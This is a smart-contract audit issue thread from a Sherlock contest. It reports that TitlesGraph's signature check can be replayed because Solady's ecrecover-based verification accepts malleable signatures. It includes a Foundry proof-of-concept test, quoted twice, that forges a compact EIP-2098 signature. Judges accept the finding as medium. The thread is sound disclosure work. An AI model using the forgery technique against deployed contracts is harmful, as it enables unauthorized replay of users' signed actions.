### ISSUE TITLE
cducrest-brainbot - TitlesGraph's `checkSignature()` does not properly check replayability

### ISSUE THREAD

**Issue by sherlock-admin4** [sherlock-audit/2024-04-titles-judging#105]
cducrest-brainbot

high

# TitlesGraph's `checkSignature()` does not properly check replayability

## Summary

The modifier to check a user's signature `checkSignature()` does not properly enforce non-malleability / replayability of signatures.

## Vulnerability Detail

The function attempts to prevent replaying signatures by using a mapping from bytes to boolean `_isUsed[keccak256(signature)]`: 

```solidity
    modifier checkSignature(bytes32 edgeId, bytes calldata data, bytes calldata signature) {
        bytes32 digest = _hashTypedData(keccak256(abi.encode(ACK_TYPEHASH, edgeId, data)));
        if (
            !edges[edgeId].to.creator.target.isValidSignatureNowCalldata(digest, signature)
                || _isUsed[keccak256(signature)]  // @audit insufficient for non-replayability and does not check non-malleability
        ) {
            revert Unauthorized();
        }
        _;
        _isUsed[keccak256(signature)] = true;
    }
```

This is intended to prevent a single signature produced by a signer to be used multiple times by a caller. However the library used for verifying the signature is not strict enough on the expected signature format and uses the `ecrecover` precompile which is notoriously vulnerable to malleability.

Anyone can observe a valid signature for `checkSignature()` and produce a different valid signature (with a different hash) for the same data. As such, the `_isUsed` mapping is insufficient to prevent non-replayability of signatures.

The used library even warns about this:

```solidity
/// @dev Note:
/// - The signature checking functions use the ecrecover precompile (0x1).
/// - The `bytes memory signature` variants use the identity precompile (0x4)
///   to copy memory internally.
/// - Unlike ECDSA signatures, contract signatures are revocable.
/// - As of Solady version 0.0.134, all `bytes signature` variants accept both
///   regular 65-byte `(r, s, v)` and EIP-2098 `(r, vs)` short form signatures.
///   See: https://eips.ethereum.org/EIPS/eip-2098
///   This is for calldata efficiency on smart accounts prevalent on L2s.
///
/// WARNING! Do NOT use signatures as unique identifiers:
/// - Use a nonce in the digest to prevent replay attacks on the same contract.
/// - Use EIP-712 for the digest to prevent replay attacks across different chains and contracts.
///   EIP-712 also enables readable signing of typed data for better user safety.
/// This implementation does NOT check if a signature is non-malleable.
library SignatureCheckerLib { ... }
```

And it is obvious when reading the code of the library that it allows different format of signatures and calls the precompile at `address(1)` (ecrecover).

## Impact

The modifier `checkSignature()` can be tricked and signatures can be replayed to pass its check. Currently this modifier is used to protect `acknowledgeEdge()` and `unacknowledgeEdge()` functions. As such, a creator that acknowledges an edge using a signature and later unacknowledges the edge can be abused by anyone acknowledging the edge once again in their name by replaying their signature.

If this modifier is later used on other functions, it could have critical consequences. 

## Code Snippet

https://github.com/Vectorized/solady/blob/a34977e56cc1437b7ac07e6356261d2b303da686/src/utils/SignatureCheckerLib.sol#L120-L203

https://github.com/sherlock-audit/2024-04-titles/blob/d7f60952df22da00b772db5d3a8272a988546089/wallflower-contract-v2/src/graph/TitlesGraph.sol#L40-L50

## Tool used

Manual Review

## Recommendation

This feature of acknowledging and edge via signature does not seem vital and could be deleted. Otherwise, enforce strict requirements on the signature or use a hash of the signed data in the `_isUsed` mapping instead of a hash of the signature. Signers will have to use different data to replay their intent.

Duplicate of #279

**Comment by cducrest** [comment]
Escalate

This is a valid high issue. The signatures are malleable. I wrote a test to prove it using the same Solady library used by the protocol. The test build two valid and one invalid signature that are different for the same data and recovered address:

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.24;

import {Test, console} from "forge-std/Test.sol";
import {EIP712} from "lib/solady/src/utils/EIP712.sol";
import {TitlesGraph} from "src/graph/TitlesGraph.sol";
import {SignatureCheckerLib} from "lib/solady/src/utils/SignatureCheckerLib.sol";

contract MalleabilitySignatureTest is Test, EIP712 {

    using SignatureCheckerLib for address;

    bytes32 public constant ACK_TYPEHASH = keccak256("Ack(bytes32 edgeId,bytes data)");

    // test data
    bytes32 testEdgeId = keccak256("test edgeId");
    bytes testData = hex"abcd";

    function test_sig() public {
        uint256 pk = 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80;
        bytes32 digest = _computeDigest(testEdgeId, testData);
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(pk, digest);
        // address pkAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes32(pk))))));
        address pkAddress = address(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266);
    
        bytes memory signature = abi.encodePacked(r, s, v);  // @audit-info size 65, parity is 1 (or 28)
        bytes memory forgedSignature = abi.encodePacked(r, s);
        bytes memory incorrectSignature = abi.encodePacked(r, v, r);

        assembly {
            let vs := mload(add(0x40, forgedSignature))
            mstore(add(0x40, forgedSignature), add(vs, shl(255, 1)))  // @audit-info stores the parity into vs
        }
        
        console.logBytes(signature);           // 0x7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f57126023 7a 38e0fed802f8a9d598d9aed0d7898562c51e09bfa7cf254e5a8a5bc74106561c
        console.logBytes(forgedSignature);     // 0x7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f57126023 fa 38e0fed802f8a9d598d9aed0d7898562c51e09bfa7cf254e5a8a5bc7410656
        console.logBytes(incorrectSignature);  // 0x7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f571260231c7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f57126023

        bool isValid;

        isValid = pkAddress.isValidSignatureNow(digest, signature);
        assertEq(isValid, true);
        isValid = pkAddress.isValidSignatureNow(digest, forgedSignature);
        assertEq(isValid, true);
        isValid = pkAddress.isValidSignatureNow(digest, incorrectSignature);
        assertEq(isValid, false);
    }

    function _computeDigest(bytes32 edgeId, bytes memory data) internal returns (bytes32 digest) {
        digest = _hashTypedData(keccak256(abi.encode(ACK_TYPEHASH, edgeId, data)));
    }

    function _domainNameAndVersion()
        internal
        pure
        override
        returns (string memory name, string memory version)
    {
        name = "TitlesGraph";
        version = "1";
    }
}
```

For any signature on the hash representing an action on an edge (acknowledge / de-acknowledge), one can reconstruct a different valid siganture for the same address and data.

The signature verification function `isValidSignatureNow()` is the same used in `TitlesGraph`:

https://github.com/sherlock-audit/2024-04-titles/blob/d7f60952df22da00b772db5d3a8272a988546089/wallflower-contract-v2/src/graph/TitlesGraph.sol#L7

https://github.com/sherlock-audit/2024-04-titles/blob/d7f60952df22da00b772db5d3a8272a988546089/wallflower-contract-v2/src/graph/TitlesGraph.sol#L40-L50

I simply use the memory version of the signature verification (`isValidSignatureNow()`) instead of the calldata version (`isValidSignatureNowCalldata()`) to be able to use it in foundry tests.

**Comment by sherlock-admin3** [comment]
> Escalate
> 
> This is a valid high issue. The signatures are malleable. I wrote a test to prove it using the same Solady library used by the protocol. The test build two valid and one invalid signature that are different for the same data and recovered address:
> 
> ```solidity
> // SPDX-License-Identifier: UNLICENSED
> pragma solidity ^0.8.24;
> 
> import {Test, console} from "forge-std/Test.sol";
> import {EIP712} from "lib/solady/src/utils/EIP712.sol";
> import {TitlesGraph} from "src/graph/TitlesGraph.sol";
> import {SignatureCheckerLib} from "lib/solady/src/utils/SignatureCheckerLib.sol";
> 
> contract MalleabilitySignatureTest is Test, EIP712 {
> 
>     using SignatureCheckerLib for address;
> 
>     bytes32 public constant ACK_TYPEHASH = keccak256("Ack(bytes32 edgeId,bytes data)");
> 
>     // test data
>     bytes32 testEdgeId = keccak256("test edgeId");
>     bytes testData = hex"abcd";
> 
>     function test_sig() public {
>         uint256 pk = 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80;
>         bytes32 digest = _computeDigest(testEdgeId, testData);
>         (uint8 v, bytes32 r, bytes32 s) = vm.sign(pk, digest);
>         // address pkAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes32(pk))))));
>         address pkAddress = address(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266);
>     
>         bytes memory signature = abi.encodePacked(r, s, v);  // @audit-info size 65, parity is 1 (or 28)
>         bytes memory forgedSignature = abi.encodePacked(r, s);
>         bytes memory incorrectSignature = abi.encodePacked(r, v, r);
> 
>         assembly {
>             let vs := mload(add(0x40, forgedSignature))
>             mstore(add(0x40, forgedSignature), add(vs, shl(255, 1)))  // @audit-info stores the parity into vs
>         }
>         
>         console.logBytes(signature);           // 0x7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f57126023 7a 38e0fed802f8a9d598d9aed0d7898562c51e09bfa7cf254e5a8a5bc74106561c
>         console.logBytes(forgedSignature);     // 0x7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f57126023 fa 38e0fed802f8a9d598d9aed0d7898562c51e09bfa7cf254e5a8a5bc7410656
>         console.logBytes(incorrectSignature);  // 0x7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f571260231c7bd09aece710ef3845f26c4a695d357b1b170f75d0702f18ec09409f57126023
> 
>         bool isValid;
> 
>         isValid = pkAddress.isValidSignatureNow(digest, signature);
>         assertEq(isValid, true);
>         isValid = pkAddress.isValidSignatureNow(digest, forgedSignature);
>         assertEq(isValid, true);
>         isValid = pkAddress.isValidSignatureNow(digest, incorrectSignature);
>         assertEq(isValid, false);
>     }
> 
>     function _computeDigest(bytes32 edgeId, bytes memory data) internal returns (bytes32 digest) {
>         digest = _hashTypedData(keccak256(abi.encode(ACK_TYPEHASH, edgeId, data)));
>     }
> 
>     function _domainNameAndVersion()
>         internal
>         pure
>         override
>         returns (string memory name, string memory version)
>     {
>         name = "TitlesGraph";
>         version = "1";
>     }
> }
> ```
> 
> For any signature on the hash representing an action on an edge (acknowledge / de-acknowledge), one can reconstruct a different valid siganture for the same address and data.
> 
> The signature verification function `isValidSignatureNow()` is the same used in `TitlesGraph`:
> 
> https://github.com/sherlock-audit/2024-04-titles/blob/d7f60952df22da00b772db5d3a8272a988546089/wallflower-contract-v2/src/graph/TitlesGraph.sol#L7
> 
> https://github.com/sherlock-audit/2024-04-titles/blob/d7f60952df22da00b772db5d3a8272a988546089/wallflower-contract-v2/src/graph/TitlesGraph.sol#L40-L50
> 
> I simply use the memory version of the signature verification (`isValidSignatureNow()`) instead of the calldata version (`isValidSignatureNowCalldata()`) to be able to use it in foundry tests.

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by WangSecurity** [comment]
Agree with the escalation, planning to accept and duplicate with #279

**Comment by Evert0x** [comment]
Result:
Medium
Duplicate of #279

**Comment by sherlock-admin4** [comment]
Escalations have been resolved successfully!

Escalation status:
- [cducrest](https://github.com/sherlock-audit/2024-04-titles-judging/issues/105/#issuecomment-2108113129): accepted
